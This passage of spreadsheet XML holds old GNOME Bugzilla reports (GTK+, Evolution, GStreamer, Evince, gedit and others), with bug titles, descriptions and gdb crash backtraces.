/usr/lib/libiconv.2.4.0.dylib(localcharset.o) definition of _locale_charset
/opt/local/lib/libintl.8.0.2.dylib(localcharset.o) definition of _locale_charset
make[3]: *** [ecal.la] Error 1</t>
  </si>
  <si>
    <t>john.stowers</t>
  </si>
  <si>
    <t>GTKMM-329715</t>
  </si>
  <si>
    <t>Add documentation for building gtkmm with jhbuild</t>
  </si>
  <si>
    <t>I thought it might be useful to add an appendix to the tutorial explaining how to work with gtkmm from CVS specifically using jhbuild.  I'll attach a patch.  The patch also updates a couple things in the 'installation' section and provides a link to the jhbuild appendix.  Do you think something like this would be useful?</t>
  </si>
  <si>
    <t>GEDIT-393657</t>
  </si>
  <si>
    <t>gedit should load libpython on demand when the first python plugin is loaded</t>
  </si>
  <si>
    <t>Hi
is there any plan to dramatically reduce gedit memory usage ? On my laptop starting 2.14 requires 27MiB of resident memory. It makes the startup slow and painful. Emacs on the other hand requires 10MiB (ok emacs is slower to start) and gvim 9.5MiB. AND Abiword is only 20MiB.
Sorry friends i like you but this is an issue for GNOME notepad even if it has many more features than MS notepad i guess most users use it to open simple text files.</t>
  </si>
  <si>
    <t>GTK+-307084</t>
  </si>
  <si>
    <t>combo box in list mode does not stay popped up when I click on the text instead of the button</t>
  </si>
  <si>
    <t>1. Create a GtkComboBox with appears-as-list set to true.
2. Click once on the arrow button.
3. Observe that the popup is now visible and items can be selected.
4. Close the popup.
5. Click once on the text area instead of the button.
6. Observe that the popup appeared and then immediately disappeared.
I have tested this on Winows XP only so it might be platform specific but the
code doesn't look that way.
Note that this is only a problem if you click.  If you hold the mouse button
down you can move down and select items not matter where on the combo box you
start dragging.</t>
  </si>
  <si>
    <t>t.evans.638</t>
  </si>
  <si>
    <t>GNOME-UTILS-75878</t>
  </si>
  <si>
    <t>logview</t>
  </si>
  <si>
    <t>Unable to close logfile of choice</t>
  </si>
  <si>
    <t>SystemLogMonitor doesn't allow to close the file of choice. The later
opened files has to be closed before closing the desired file (random
closing of file is not possible)</t>
  </si>
  <si>
    <t>gnome-utils-maint</t>
  </si>
  <si>
    <t>aruna.pou</t>
  </si>
  <si>
    <t>GNOME-CORE-51614</t>
  </si>
  <si>
    <t>gnome-terminal</t>
  </si>
  <si>
    <t>DnD problem in gnome-terminal (fix supplied)</t>
  </si>
  <si>
    <t>The gnome-terminal manual claims that files and URIs can be dragged
onto a terminal. However this doesn't work and looking at the source
code it seems that it doesn't accept 'text/uri-list' as a valid
target (this seems to be the obvious target name).
The solution is to add:
	{ text/uri-list 0 TARGET_STRING }
to the list of drop targets which shouldn't break anything.
Thanks</t>
  </si>
  <si>
    <t>tal</t>
  </si>
  <si>
    <t>GTK+-88697</t>
  </si>
  <si>
    <t>Backend: X11</t>
  </si>
  <si>
    <t>testrgb segfaults on a depth 4 bpp 8 PseudoColor visual</t>
  </si>
  <si>
    <t>...since it selects gdk_rgb_convert_8 instead of the (correct)
gdk_rgb_convert_4. This was introduced when Tor Lillquist added
support for depth 5-7 PseudoColor visuals. The appended fix is needed
on both branches.</t>
  </si>
  <si>
    <t>GSTREAMER-127873</t>
  </si>
  <si>
    <t>ffmpeg builds Linux code by default</t>
  </si>
  <si>
    <t>The gst-libs/ext/ffmpeg module builds grab.c by default which is highly
Linux-centric.  In order to get gst-plugins to build on FreeBSD I had to
remove this file from the Makefile.  Can this file be made conditional on
Linux video support?  Thanks.</t>
  </si>
  <si>
    <t>EVOLUTION-207073</t>
  </si>
  <si>
    <t>Crash: ctrl A to select all</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12.99
Synopsis: ctrl A to select all
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I was attempting to select all to mark as unread (someone has the sircam virus and is send tons of mails to me).  So I selected all w/ ^a and it bombed.
Debugging Information:
[New Thread 1024 (LWP 1185)]
[New Thread 2049 (LWP 1288)]
[New Thread 10244 (LWP 3043)]
[New Thread 5126 (LWP 3038)]
0x409f5519 in __wait4 () from /lib/i686/libc.so.6
#0  0x409f5519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40a659e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406af563 in waitpid (pid=3691 stat_loc=0xbffff40c options=0)
    at wrapsyscall.c:172
#3  0x402dd262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08092baa in segv_redirect (sig=11) at main.c:67
#5  0x406ad935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 65536 esi = 3221223408 ebp = 3221223840 esp = 3221223380 ebx = 3221223408 edx = 1084643812 ecx = 3221223408 eax = 4294967292 trapno = 0 err = 0 eip = 1084184801 cs = 35 __csh = 0 eflags = 2097810 esp_at_signal = 3221223380 ss = 43 __ssh = 0 fpstate = 0xbffff558 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x409f58e1 in __libc_nanosleep () from /lib/i686/libc.so.6
#8  0x409f5761 in __sleep (seconds=1) at ../sysdeps/unix/sysv/linux/sleep.c:85
#9  0x40079ab7 in e_thread_destroy (e=0x812ebd8) at e-msgport.c:370
#10 0x08089d99 in mail_msg_cleanup () at mail-mt.c:347
#11 0x4096b22b in exit (status=0) at exit.c:54
#12 0x40957180 in __libc_start_main (main=0x8092bd4  argc=3 
    ubp_av=0xbffffa7c init=0x8063fa4  fini=0x80c3d8c  
    rtld_fini=0x4000e184  stack_end=0xbffffa74)
    at ../sysdeps/generic/libc-start.c:129
#0  0x409f5519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40a659e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406af563 in waitpid (pid=3691 stat_loc=0xbffff40c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff40c
options = 0
result = 0
oldtype = 0
#3  0x402dd262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = -1073743520
in_segv = 1
pid = 0
#4  0x08092baa in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x406ad935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 65536 esi = 3221223408 ebp = 3221223840 esp = 3221223380 ebx = 3221223408 edx = 1084643812 ecx = 3221223408 eax = 4294967292 trapno = 0 err = 0 eip = 1084184801 cs = 35 __csh = 0 eflags = 2097810 esp_at_signal = 3221223380 ss = 43 __ssh = 0 fpstate = 0xbffff558 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
signo = 0
__value = 0x8092b88 U\211Ã¥SP\213]\bÃ¨Ã‡?Ã½Ã¿\213\025Â°Ã\r\b9Ãu\025\203Ã¬\fSÂ¡\214Ã‰\r\bÃ¿Ã\203Ã„\020\213]Ã¼Ã‰Ãƒ\211Ã¶\203Ã¬\bSRÃ¨.)Ã½Ã¿\203Ã„\020Ã‡E\b
#6  
No locals.
#7  0x409f58e1 in __libc_nanosleep () from /lib/i686/libc.so.6
No locals.
Unknown reporter: harison@888.net changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>harison</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-28612</t>
  </si>
  <si>
    <t>sitting idle</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.0
Synopsis: sitting idle
Class:    sw-bug
Distribution: Red Hat Linux release 6.9.5 (Pinstripe)
System: Linux 2.2.16-17 i686 unknown
C library: glibc-2.1.91-18
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-6
gnome-core: gnome-core 1.2.1
Description:
It was just sitting there and it crashed.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x4055d749 in __wait4 () from /lib/libc.so.6
#0  0x4055d749 in __wait4 () from /lib/libc.so.6
#1  0x405c4758 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40165b18 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x405260f3 in chunk_free (ar_ptr=0x405c3800 p=0x80e1b50) at malloc.c:3105
#5  0x40525fd8 in __libc_free (mem=0x80e1b58) at malloc.c:3031
#6  0x4009cbd2 in g_free () from /usr/lib/libglib-1.2.so.0
#7  0x4009b134 in g_source_destroy_func () from /usr/lib/libglib-1.2.so.0
#8  0x40098946 in g_hook_free () from /usr/lib/libglib-1.2.so.0
#9  0x40098d0a in g_hook_unref () from /usr/lib/libglib-1.2.so.0
#10 0x4009b8db in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#11 0x4009bec1 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#12 0x4009c08c in g_main_run () from /usr/lib/libglib-1.2.so.0
#13 0x402b1e27 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#14 0x804db57 in main ()
#15 0x404cb345 in __libc_start_main (main=0x804db00  argc=1 
    ubp_av=0xbffff9d4 init=0x804c0f4  fini=0x8051fdc  
    rtld_fini=0x4000de14  stack_end=0xbffff9cc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x4055d749 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405c4758 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40165b18 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x405260f3 in chunk_free (ar_ptr=0x405c3800 p=0x80e1b50) at malloc.c:3105
hd = 4294966784
sz = 24
idx = 32
next = 0x80e1b68
nextsz = 32
prevsz = 4294966784
bck = 0x4034d8d8
fwd = 0x0
islr = 0
heap = (heap_info *) 0xbffff640
heap = (heap_info *) 0xbffff640
#5  0x40525fd8 in __libc_free (mem=0x80e1b58) at malloc.c:3031
3031	in malloc.c
mem = (void *) 0x0
ar_ptr = (arena *) 0x405c3800
p = 0x80e1b50
#6  0x4009cbd2 in g_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x4009b134 in g_source_destroy_func () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:41 -------
This bug was previously known as bug 28612 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=28612
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (Michael.D.Stemle@dhcp-219.dwdata.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>Michael.D.Stemle</t>
  </si>
  <si>
    <t>DRIVEL-162834</t>
  </si>
  <si>
    <t>DRIVEL</t>
  </si>
  <si>
    <t>Unable to login with Blogger API (was: enable utf-8 support in drivel)</t>
  </si>
  <si>
    <t>Hi there
I think it is essential that the version 1.4 supports utf-8 not only for new
postings but also for retrieving data (blog title and previous posts [if drivel
retrieves them in the future]).
Thanks for your excellent work
Pablo</t>
  </si>
  <si>
    <t>GNOME-SESSION-762681</t>
  </si>
  <si>
    <t>main: tell Qt applications to look like GNOME</t>
  </si>
  <si>
    <t>If the user is logging into GNOME then QT applications run in the
session should integrate as good as possible.
According to KDE folks the best way to achieve that is to set
QT_QPA_PLATFORMTHEME=qgnomeplatform
This commit does that.</t>
  </si>
  <si>
    <t>GSTREAMER-334322</t>
  </si>
  <si>
    <t>gst-plugins-ugly</t>
  </si>
  <si>
    <t>[mpegdemux] playbin freezes with VobSub subtitles</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load a movie file (AVI XVID AC3 in this case) with VobSub (.sub and .idx)
subtitles in the same directory using the Movie&gt;Open dialogue.
2. Totem stops responding.
Stack trace:
Starting program: /usr/local/bin/totem 
[Thread debugging using libthread_db enabled]
[New Thread -1217489232 (LWP 4400)]
[New Thread -1223890016 (LWP 4403)]
** (totem:4400): WARNING **: Trying to connect to an older version of the GNOME
screensaver
[New Thread -1224995936 (LWP 4411)]
[New Thread -1234396256 (LWP 4412)]
Program received signal SIG33 Real-time event 33.
[Switching to Thread -1224995936 (LWP 4411)]
0xffffe410 in __kernel_vsyscall ()
(gdb) thread apply all 
Display all 39883 possibilities? (y or n)
(gdb) thread apply all bt
Thread 4 (Thread -1234396256 (LWP 4412)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb787a7b6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0xb7ec6547 in gst_system_clock_obtain () from /usr/lib/libgstreamer-0.10.so.0
#3  0x08296900 in ?? ()
#4  0x082968e0 in ?? ()
#5  0xb7ef86b8 in g_log_domain_gstreamer () from /usr/lib/libgstreamer-0.10.so.0
#6  0xb7ef8958 in g_log_domain_gstreamer () from /usr/lib/libgstreamer-0.10.so.0
#7  0x000000fc in ?? ()
#8  0x00000000 in ?? ()
Thread 3 (Thread -1224995936 (LWP 4411)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb787dc16 in __nanosleep_nocancel () from /lib/libpthread.so.0
#2  0x476019e6 in g_usleep () from /usr/lib/libglib-2.0.so.0
#3  0xb6fc0340 in ?? ()
#4  0x0828a9b0 in ?? ()
#5  0xb6fc5cab in gst_xvimage_buffer_get_type () from
/usr/lib/gstreamer-0.10/libgstxvimagesink.so
#6  0x02dc4f80 in ?? ()
#7  0x00000000 in ?? ()
Thread 2 (Thread -1223890016 (LWP 4403)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb77c1410 in poll () from /lib/libc.so.6
#2  0x475e0c9e in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#3  0x00000009 in ?? ()
#4  0xb70ce3f4 in ?? ()
#5  0x47643608 in glib_mem_profiler_table () from /usr/lib/libglib-2.0.so.0
#6  0x47643620 in g_thread_use_default_impl () from /usr/lib/libglib-2.0.so.0
#7  0x47643970 in ?? () from /usr/lib/libglib-2.0.so.0
#8  0x00000001 in ?? ()
#9  0x00000001 in ?? ()
#10 0x0824d590 in ?? ()
#11 0xb78793f0 in pthread_mutex_destroy () from /lib/libpthread.so.0
#12 0xb7879cc0 in __pthread_mutex_unlock_usercnt () from /lib/libpthread.so.0
#13 0xb77c1390 in fts_read () from /lib/libc.so.6
#14 0x475fefd2 in g_thread_self () from /usr/lib/libglib-2.0.so.0
#15 0x0808fff8 in ?? ()
#16 0xffffffff in ?? ()
#17 0x7fffffff in ?? ()
#18 0x476432a8 in ?? () from /usr/lib/libglib-2.0.so.0
#19 0x08254b78 in ?? ()
#20 0xb78793f0 in pthread_mutex_destroy () from /lib/libpthread.so.0
#21 0x08253fe8 in ?? ()
#22 0x475e10e4 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#23 0x00000000 in ?? ()
Thread 1 (Thread -1217489232 (LWP 4400)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb78771d6 in __nptl_setxid () from /lib/libpthread.so.0
#2  0xb7882108 in __nptl_nthreads () from /lib/libpthread.so.0
#3  0xb76e96b0 in ?? ()
#4  0xb7830ff4 in ?? () from /lib/libc.so.6
#5  0x08273470 in ?? ()
#6  0x00000000 in ?? ()
#0  0xffffe410 in __kernel_vsyscall ()
Other information:</t>
  </si>
  <si>
    <t>lukas.polivka</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-312962</t>
  </si>
  <si>
    <t>Internet is a proper noun</t>
  </si>
  <si>
    <t>The word Internet is a proper noun and needs to be capitalized.
#: interfaces/network.glade.in.h:61                                                                                                                                    
msgid _Set modem as default route to internet
#: src/services/service.c:38 src/services/service.c:39                                                                                                                 
msgid Shares files though internet
#: src/services/service.c:41                                                                                                                                                                                                                                                  
msgid Delivers your mails through internet
(Note also here that mails is a poor substitute for email... I'd rather see Delivers your outgoing mail 
or something)
#: src/services/service.c:42                                                                                                                                           
msgid Synchronizes your computer clock with internet time servers
#: src/services/service.c:46                                                                                                                                           
msgid Shares your web pages through internet
(Shouldn't this be over the Internet not through internet?)
#: src/time/main.c:466                                                                                                                                                 
msgid                                                                                                                                                                
Please install and activate NTP support in the system to enable                                                                                                      
synchronization of your local time server with internet time servers.</t>
  </si>
  <si>
    <t>GSTREAMER-135285</t>
  </si>
  <si>
    <t>dont know</t>
  </si>
  <si>
    <t>weird things when playing buggy mp3 file</t>
  </si>
  <si>
    <t>Gstreamer always crashes with a SIGSEGV when playing this file:
http://www.jeacocke.org.uk/2003/ossdev/crashes_gstreamer_0_6_4.mp3
I'm running Debian and gstreamer 0.6.5 isn't in unstable yet so I can't 
test the file with your new release. Could someone who uses 0.6.5 test and 
see if this file still crashes gstreamer?
This is the command that I executed:
stewart@orb:~$ gst-launch filesrc location=crashes_gstreamer_0_6_4.mp3 ! 
mad ! osssink
INFO ( 4734: 0) Initializing GStreamer Core Library version 0.6.4
INFO ( 4734: 0) CPU features: (00000762) MMX SSE 3DNOW MMXEXT
INFO ( 4734: 0) registry: loaded global_registry in 0.147870 seconds
          (/var/lib/gstreamer/0.6/registry.xml)
GStreamer-INFO: 0 live buffer(s)
GStreamer-INFO: 0 live bufferpool(s)
GStreamer-INFO: 0 live event(s)
RUNNING pipeline
Caught SIGSEGV accessing address 0x8
#0  0x40201346 in wait () from /lib/tls/libpthread.so.0
#1  0x00000000 in ?? ()
Spinning.  Please run 'gdb gst-launch 4734' to continue debugging Ctrl-C 
to quit or Ctrl-\ to dump core.</t>
  </si>
  <si>
    <t>GTHUMB-152441</t>
  </si>
  <si>
    <t>fuzzy thumbnails  not sharp thumbnails</t>
  </si>
  <si>
    <t>fuzzy thumbnails  not sharp thumbnails
need sharp thumbnails... and selectable to create a minim size
2.4.2 version all others the same
Suse 9.1  kde 3.3  dont know how to find the gnome version
thanks Robert Schultz</t>
  </si>
  <si>
    <t>tmp</t>
  </si>
  <si>
    <t>GOK-154915</t>
  </si>
  <si>
    <t>gok build warnings on Solaris</t>
  </si>
  <si>
    <t>build GOK particularly with Forte.
Note problems with implicit func definitions and particularly issues with
guchar vs gchar vs char in our glib string code and xml string code. libxml
seems to want uchar but glib and strcmp seem to want char.</t>
  </si>
  <si>
    <t>EVOLUTION-327132</t>
  </si>
  <si>
    <t>UI freezes until an IMAP attachment is downloaded</t>
  </si>
  <si>
    <t>Mails in IMAP accounts with big attachments (such as several large fotos) waits
until the attachments are downloaded to show the mail text. Data should be
downloaded in background and the interface should advice the user about it
with a progress bar or the dancing toes gnome feet (that animation that
epiphany uses while pages are being loaded) one progress advice should be
showed for each attachment. At least the text should be showed with no UI idle.
Other information:</t>
  </si>
  <si>
    <t>sragavan</t>
  </si>
  <si>
    <t>EKIGA-336588</t>
  </si>
  <si>
    <t>Hard to add a new contact to addressbook</t>
  </si>
  <si>
    <t>Add a New contact button (and possibly other buttons for other function from
the context menu) to address book window.
OR
Add a New contact item to the context menu for items in the right pane so this
function is accessible even when some existing contact is selected.
Other information:
Why I write this:
When some existing contact is selected it's not possible to add a new contact
intuitively/quickly. To achieve it I first need to click on the current contact
list name on the left to UNselect the contact on the right. Now when I right
click the white area on the right one context-menu item New contact is offered.
Strange: Menu item and context menu item New contact availability are mutually
exclusive based on whether some contact on the right pane is selected or not.
As late as today I discovered the New contact item is also in the pull-down menu.</t>
  </si>
  <si>
    <t>tuttle</t>
  </si>
  <si>
    <t>GNOME-VFS-41226</t>
  </si>
  <si>
    <t>Missing error handling code in CORBA back-end?</t>
  </si>
  <si>
    <t xml:space="preserve">there is a vague FIXME comment in three places in gnome-vfs-slave.c presumably
about the lack of enough error handling code.
------- Additional Comments From snickell@stanford.edu 2001-07-23 00:35:26 ----
Taking bugs previously assigned to Pavel assigning them to myself. Will parse
them out at my leisure  but many are GnomeVFS bugs we should look at for 2.0
------- Additional Comments From mjs@noisehavoc.org 2001-08-26 19:18:28 ----
No longer relevant since the CORBA back end is gone.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
The original reporter (pavel@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>PANGO-512566</t>
  </si>
  <si>
    <t>dont' use deprecated macro</t>
  </si>
  <si>
    <t>G_GNUC_PRETTY_FUNCTION has been deprecated.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-61349</t>
  </si>
  <si>
    <t>desktop</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.2
Synopsis: desktop
Class:    sw-bug
System: SunOS 5.8 sun4u sparc
C compiler: 2.95.2
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.11
libxml: 1.8.10
gnome-print: gnome-print-0.25
gnome-core: gnome-core 1.2.4
Description:
i have no panel. None. No way to logout besides killing processes.
Debugging information:
0xfe99b970 in _waitid () from /usr/lib/libc.so.1
#0  0xfe99b970 in _waitid () from /usr/lib/libc.so.1
#1  0xfe955d48 in _waitpid () from /usr/lib/libc.so.1
#2  0xff012520 in gnome_segv_handle (signum=11) at gnome-init.c:660
#3  
#4  GNOME_capplet_help (_obj=0x0 id=12288 ev=0x0)
    at control-center-stubs.c:278
#5  0x178fc in item_help_callback (widget=0xdb998 data=0x170fc8)
    at callbacks.c:92
#6  0xfedcff2c in gtk_marshal_NONE__NONE () from /opt/gnome/lib/libgtk-1.2.so.0
#7  0xfee13918 in gtk_handlers_run () from /opt/gnome/lib/libgtk-1.2.so.0
#8  0xfee12710 in gtk_signal_real_emit () from /opt/gnome/lib/libgtk-1.2.so.0
#9  0xfee0f618 in gtk_signal_emit () from /opt/gnome/lib/libgtk-1.2.so.0
#10 0xfee5c024 in gtk_widget_activate () from /opt/gnome/lib/libgtk-1.2.so.0
#11 0xfeddb428 in gtk_menu_shell_activate_item ()
   from /opt/gnome/lib/libgtk-1.2.so.0
#12 0xfedd9ea0 in gtk_menu_shell_button_release ()
   from /opt/gnome/lib/libgtk-1.2.so.0
#13 0xfedcfcbc in gtk_marshal_BOOL__POINTER ()
   from /opt/gnome/lib/libgtk-1.2.so.0
#14 0xfee12758 in gtk_signal_real_emit () from /opt/gnome/lib/libgtk-1.2.so.0
#15 0xfee0f618 in gtk_signal_emit () from /opt/gnome/lib/libgtk-1.2.so.0
#16 0xfee5be00 in gtk_widget_event () from /opt/gnome/lib/libgtk-1.2.so.0
#17 0xfedcfc50 in gtk_propagate_event () from /opt/gnome/lib/libgtk-1.2.so.0
#18 0xfedcea08 in gtk_main_do_event () from /opt/gnome/lib/libgtk-1.2.so.0
#19 0xfecbedc0 in gdk_event_dispatch () from /opt/gnome/lib/libgdk-1.2.so.0
#20 0xff277cdc in g_main_dispatch () from /opt/gnome/lib/libglib-1.2.so.0
#21 0xff278578 in g_main_iterate () from /opt/gnome/lib/libglib-1.2.so.0
#22 0xff2787ac in g_main_run () from /opt/gnome/lib/libglib-1.2.so.0
#23 0xfedce044 in gtk_main () from /opt/gnome/lib/libgtk-1.2.so.0
#24 0x17cc8 in control_center_corba_gtk_main (argc=0xffbeecac argv=0x2e248)
    at corba-glue.c:126
#25 0x16990 in main (argc=1 argv=0xffbeeccc) at main.c:283
#0  0xfe99b970 in _waitid () from /usr/lib/libc.so.1
No symbol table info available.
#1  0xfe955d48 in _waitpid () from /usr/lib/libc.so.1
No symbol table info available.
#2  0xff012520 in gnome_segv_handle (signum=11) at gnome-init.c:660
estatus = 858536
in_segv = 1
pid = 0
#3  
No symbol table info available.
#4  GNOME_capplet_help (_obj=0x0 id=12288 ev=0x0)
    at control-center-stubs.c:278
_ORBIT_request_id = 0
_ORBIT_completion_status = CORBA_COMPLETED_YES
_ORBIT_send_buffer = (GIOPSendBuffer *) 0x0
_ORBIT_recv_buffer = (GIOPRecvBuffer *) 0x0
_cnx = (GIOPConnection *) 0x0
#5  0x178fc in item_help_callback (widget=0xdb998 data=0x170fc8)
    at callbacks.c:92
No locals.
#6  0xfedcff2c in gtk_marshal_NONE__NONE () from /opt/gnome/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0xfee13918 in gtk_handlers_run () from /opt/gnome/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-28 11:53 -------
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (dunncd@cs.orst.edu) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>dunncd</t>
  </si>
  <si>
    <t>EVINCE-358648</t>
  </si>
  <si>
    <t>crash in Document Viewer: Typing a / when reading ...</t>
  </si>
  <si>
    <t>Version: 0.6.0
What were you doing when the application crashed?
Typing a / when reading a gunzip'ped copy of http://www.gnu.org/software/auctex/preview-manual/preview-latex.dvi.gz
Distribution: Debian testing/unstable
Gnome Release: 2.16.0 2006-09-07 (JHBuild)
BugBuddy Version: 2.16.0
Memory status: size: 55320576 vsize: 0 resident: 55320576 share: 0 rss: 30449664 rss_rlim: 0
CPU usage: start_time: 1159659200 rtime: 0 utime: 384 stime: 0 cutime:311 cstime: 0 timeout: 73 it_real_value: 0 frequency: 0
Backtrace was generated from '/opt/gnome-2-16/bin/evince'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1231468864 (LWP 17786)]
[New Thread -1233691728 (LWP 17787)]
0xb720e201 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb720e201 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7efa9d5 in libgnomeui_segv_handle (signum=6) at gnome-ui-init.c:870
#2  
#3  0xb70f8947 in raise () from /lib/tls/libc.so.6
#4  0xb70fa0c9 in abort () from /lib/tls/libc.so.6
#5  0xb74241a4 in IA__g_logv (log_domain= log_level=G_LOG_LEVEL_ERROR 
    format=0x80b50f0 Find action should be insensitive since document doesn't support find 
    args1=0xbfd45a6c Ã²\027IÂ·Ã¸&amp;LÂ·Ã \021\a\b\230ZÃ”Â¿Ã‹\005JÂ·PI\035\bx\020\020\b\002) at gmessages.c:497
#6  0xb74241d9 in IA__g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x80b50f0 Find action should be insensitive since document doesn't support find) at gmessages.c:517
#7  0x080712ae in ev_window_cmd_edit_find (action=0x81d4950 ev_window=0x8101078) at ev-window.c:1889
#8  0xb74a05cb in IA__g_cclosure_marshal_VOID__VOID (closure=0x8232868 return_value=0x0 n_param_values=1 
    param_values=0xbfd45cac invocation_hint=0xbfd45bbc marshal_data=0x80711e0) at gmarshal.c:77
#9  0xb749313b in IA__g_closure_invoke (closure=0x8232868 return_value=0x0 n_param_values=1 param_values=0xbfd45cac 
    invocation_hint=0xbfd45bbc) at gclosure.c:490
#10 0xb74a36dd in signal_emit_unlocked_R (node=0x81102e0 detail=0 instance=0x81d4950 emission_return=0x0 
    instance_and_params=0xbfd45cac) at gsignal.c:2438
#11 0xb74a4bd9 in IA__g_signal_emit_valist (instance=0x81d4950 signal_id=109 detail=0 
    var_args=0xbfd45eec ÃˆÃ½\224Â·Ã€Ã®\021\bÃ¿Ã¿Ã¿Ã¿\030_Ã”Â¿\004\213fÂ·PI\035\b\001) at gsignal.c:2197
#12 0xb74a4d89 in IA__g_signal_emit (instance=0x81d4950 signal_id=109 detail=0) at gsignal.c:2241
#13 0xb7666743 in _gtk_action_emit_activate (action=0x81d4950) at gtkaction.c:835
#14 0xb7668b04 in closure_accel_activate (closure=0x811eec0 return_value=0xbfd46050 n_param_values=4 param_values=0xbfd4612c 
    invocation_hint=0xbfd4603c marshal_data=0x0) at gtkaction.c:1602
#15 0xb749313b in IA__g_closure_invoke (closure=0x811eec0 return_value=0xbfd46050 n_param_values=4 param_values=0xbfd4612c 
    invocation_hint=0xbfd4603c) at gclosure.c:490
#16 0xb74a36dd in signal_emit_unlocked_R (node=0x81194f8 detail=906 instance=0x811ad60 emission_return=0xbfd462ec 
    instance_and_params=0xbfd4612c) at gsignal.c:2438
#17 0xb74a49b8 in IA__g_signal_emit_valist (instance=0x811ad60 signal_id=121 detail=906 
    var_args=0xbfd46378 \210cÃ”Â¿$fÂ·x\020\020\bÂ­\002) at gsignal.c:2207
#18 0xb74a4d89 in IA__g_signal_emit (instance=0x811ad60 signal_id=121 detail=906) at gsignal.c:2241
#19 0xb7662639 in IA__gtk_accel_group_activate (accel_group=0x811ad60 accel_quark=906 acceleratable=0x8101078 accel_key=47 
    accel_mods=0) at gtkaccelgroup.c:736
#20 0xb766273a in IA__gtk_accel_groups_activate (object=0x8101078 accel_key=47 accel_mods=0) at gtkaccelgroup.c:774
#21 0xb786b8ba in IA__gtk_window_activate_key (window=0x8101078 event=0x8273728) at gtkwindow.c:7704
#22 0xb786b93c in gtk_window_key_press_event (widget=0x8101078 event=0x8273728) at gtkwindow.c:4697
#23 0xb7746ee2 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80f3428 return_value=0xbfd465a0 n_param_values=2 
    param_values=0xbfd4667c invocation_hint=0xbfd4658c marshal_data=0xb786b910) at gtkmarshalers.c:83
#24 0xb74916f9 in g_type_class_meta_marshal (closure=0x80f3428 return_value=0xbfd465a0 n_param_values=2 
    param_values=0xbfd4667c invocation_hint=0xbfd4658c marshal_data=0xcc) at gclosure.c:567
